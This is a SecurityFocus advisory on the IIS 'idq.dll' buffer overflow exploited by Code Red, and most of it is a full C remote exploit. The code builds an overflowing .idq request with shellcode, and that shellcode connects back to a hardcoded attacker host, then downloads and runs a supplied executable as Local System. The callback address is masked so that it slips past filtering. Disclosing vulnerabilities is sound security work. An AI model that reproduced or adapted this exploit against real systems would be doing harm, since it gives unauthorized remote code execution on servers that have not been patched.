source: http://www.securityfocus.com/bid/2880/info
 
Windows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.
 
Note that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.
 
Note also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable.

/*
 IIS5.0 .idq overrun remote exploit
 Programmed by hsj  : 01.06.21

 code flow:
  overrun -> jmp or call ebx -> jmp 8 ->
  check shellcode addr and jump to there ->
  shellcode -> make back channel -> download & exec code
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define RET                 0x77e516de  /* jmp or call ebx */
#define GMHANDLEA           0x77e56c42  /* Address of GetModuleHandleA */
#define GPADDRESS           0x77e59ac1  /* Address of GetProcAddress */
#define GMHANDLEA_OFFSET    24
#define GPADDRESS_OFFSET    61
#define OFFSET              234         /* exception handler offset */
#define NOP                 0x41

#define MASKING             1
#if MASKING
#define PORTMASK            0x4141
#define ADDRMASK            0x41414141
#define PORTMASK_OFFSET     128
#define ADDRMASK_OFFSET     133
#endif

#define PORT                80
#define ADDR                "attacker.mydomain.co.jp"
#define PORT_OFFSET         115
#define ADDR_OFFSET         120
unsigned char shellcode[]=
"\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0"
"\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
"\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88"
"\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
"\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8"
"\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
"\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66"
"\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
#if MASKING
"\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
#endif
"\x8B\x46\xF8\xFF\xD0\x33\xC0"
"\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07"
"\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
"\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B"
"\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
"\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0"
"\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";

unsigned char storage[]=
"\xEB\x02"
"\xEB\x4E"
"\xE8\xF9\xFF\xFF\xFF"
"msvcrt.ws2_32.socket.connect.recv.closesocket."
"_open._write._close._execl.";

unsigned char forwardjump[]=
"%u08eb";

unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";

unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}

int make_connection(char *address,int port)
{
    struct sockaddr_in server,target;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;
    memset((char *)&server,0,sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if(target.sin_addr.s_addr==0)
    {
        close(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -3;
    }
    if(i==0)
    {
        close(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        errno = bf;
        return -5;
    }
    ioctl(s,FIONBIO,&bf);
    return s;
}

int get_connection(int port)
{
    struct sockaddr_in local,remote;
    int lsock,csock,len,reuse_addr;

    lsock = socket(AF_INET,SOCK_STREAM,0);
    if(lsock<0)
    {
        perror("socket");
        exit(1);
    }
    reuse_addr = 1;
    if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reus
e_addr))<0)
    {
        perror("setsockopt");
        close(lsock);
        exit(1);
    }
    memset((char *)&local,0,sizeof(local));
    local.sin_family = AF_INET;
    local.sin_port = htons(port);
    local.sin_addr.s_addr = htonl(INADDR_ANY);
    if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)
    {
        perror("bind");
        close(lsock);
        exit(1);
    }
    if(listen(lsock,1)<0)
    {
        perror("listen");
        close(lsock);
        exit(1);
    }
retry:
    len = sizeof(remote);
    csock = accept(lsock,(struct sockaddr *)&remote,&len);
    if(csock<0)
    {
        if(errno!=EINTR)
        {
            perror("accept");
            close(lsock);
            exit(1);
        }
        else
            goto retry;
    }
    close(lsock);
    return csock;
}

int main(int argc,char *argv[])
{
    int i,j,s,pid;
    unsigned int cb;
    unsigned short port;
    char *p,buf[512],buf2[512],buf3[2048];
    FILE *fp;

    if(argc!=3)
    {
        printf("usage: $ %s ip file\n",argv[0]);
        return -1;
    }
    if((fp=fopen(argv[2],"rb"))==0)
        return -2;

    if(!(cb=resolve(ADDR)))
        return -3;

    if((pid=fork())<0)
        return -4;

    if(pid)
    {
        fclose(fp);
        s = make_connection(argv[1],80);
        if(s<0)
        {
            printf("connect error:[%d].\n",s);
            kill(pid,SIGTERM);
            return -5;
        }

        j = strlen(shellcode);
        *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;
        *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;
        port = htons(PORT);
#if MASKING
        port ^= PORTMASK;
        cb ^= ADDRMASK;
        *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;
        *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;
#endif
        *(unsigned short *)&shellcode[PORT_OFFSET] = port;
        *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
        for(i=0;i<strlen(shellcode);i++)
        {
            if((shellcode[i]==0x0a)||
               (shellcode[i]==0x0d)||
               (shellcode[i]==0x3a))
                break;
        }
        if(i!=j)
        {
            printf("bad portno or ip address...\n");
            close(s);
            kill(pid,SIGTERM);
            return -6;
        }

        memset(buf,1,sizeof(buf));
        p = &buf[OFFSET-2];
        sprintf(p,"%s",forwardjump);
        p += strlen(forwardjump);
        *p++ = 1;
        *p++ = '%';
        *p++ = 'u';
        sprintf(p,"%04x",(RET>>0)&0xffff);
        p += 4;
        *p++ = '%';
        *p++ = 'u';
        sprintf(p,"%04x",(RET>>16)&0xffff);
        p += 4;
        *p++ = 1;
        sprintf(p,"%s",jump_to_shell);

        memset(buf2,NOP,sizeof(buf2));
        memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage,
strlen(storage));
        memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellco
de));
        buf2[sizeof(buf2)-1] = 0;

        sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell: %s\r\n\r\n",buf,buf2);
        write(s,buf3,strlen(buf3));

        printf("---");
        for(i=0;i<strlen(buf3);i++)
        {
            if((i%16)==0)
                printf("\n");
            printf("%02X ",buf3[i]&0xff);
        }
        printf("\n---\n");

        wait(0);
        sleep(1);
        shutdown(s,2);
        close(s);

        printf("Done.\n");
    }
    else
    {
        s = get_connection(PORT);
        j = 0;
        while((i=fread(buf,1,sizeof(buf),fp)))
        {
            write(s,buf,i);
            j += i;
            printf(".");
            fflush(stdout);
        }
        fclose(fp);
        printf("\n%d bytes send...\n",j);

        shutdown(s,2);
        close(s);
    }

    return 0;
}


